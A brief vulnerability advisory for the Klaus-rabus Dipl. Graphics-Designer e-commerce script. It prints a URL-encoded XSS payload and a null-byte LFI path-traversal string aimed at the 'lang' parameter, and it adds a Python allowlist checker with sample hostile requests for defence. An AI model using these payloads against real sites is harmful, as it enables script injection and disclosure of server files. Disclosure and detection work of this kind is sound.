================================================================
Klaus-rabus Dipl.Graphics-Designer Ecommerce V.1.x Multiple Vulnerabilities
================================================================
Vendor: Dipl. Graphics-Designer (KH)
Site  : Http://www.klaus-rabus.de
Author: R3VAN_BASTARD
================================================================
XSS

Exploit:
%27;alert%28String.fromCharCode%28102,111,117,110,100,32,66,121,32,82,101,118,97,110
%29%29//\%27;alert%28String.fromCharCode%28102,111,117,110,100,32,66,121,32,82,101,118,97,110
%29%29//%22;alert%28String.fromCharCode%28102,111,117,110,100,32,66,121,32,82,101,118,97,110
%29%29//\%22;alert%28String.fromCharCode%28102,111,117,110,100,32,66,121,32,82,101,118,97,110
%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode
%28102,111,117,110,100,32,66,121,32,82,101,118,97,110%29%29%3C/SCRIPT%3E

File: Http://Localhost.com/_frame/left.php?lang=
================================================================
Local File Inclusion [LFI]

File: Http://Localhost.com/news.php?lang=[LFI]

Exploit:
../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
================================================================
1. Vendor has been contacted
2. Vendor responded and patched
3. Advisory released
================================================================
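
Both issues above arrive through the `lang` parameter of `_frame/left.php` and `news.php`. The following is an added example, not part of the original advisory or the vendor's code: a Python check that flags requests to those two scripts whose `lang` value falls outside an allowlist. The language-code pattern, the reason labels and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: valid values are short language codes such as "de" or "en-gb".
LANG_RE = re.compile(r"[a-z]{2}(?:-[a-z]{2})?")
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")   # "../" or "..\" after URL decoding
MARKUP_RE = re.compile(r"[<>\"'()]")      # characters needed to break out into script
# Scripts the advisory names as reading the lang parameter.
WATCHED = ("/_frame/left.php", "/news.php")


def classify_lang(value):
    """Return [] for an allowlisted value, else the reasons it is rejected."""
    if LANG_RE.fullmatch(value):
        return []
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")
    if TRAVERSAL_RE.search(value):
        reasons.append("path-traversal")
    if MARKUP_RE.search(value):
        reasons.append("script-injection")
    return reasons or ["not-allowlisted"]


def check_request(url):
    """Classify every lang parameter of a request to a watched script."""
    parts = urlsplit(url)
    if not parts.path.endswith(WATCHED):
        return []
    findings = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == "lang":
            findings.extend(classify_lang(value))
    return findings


# Constructed sample requests (not taken from real logs).
SAMPLES = [
    "/news.php?lang=de",
    "/news.php?lang=..%2F..%2Fconf%2Fhttpd.conf%00",
    "/_frame/left.php?lang=%27%3E%3Cscript%3Ealert(1)%3C/script%3E",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "->", check_request(url) or "ok")
```

The same allowlist, applied server-side before `lang` reaches an include path or the page output, rejects both payload classes without needing to enumerate them.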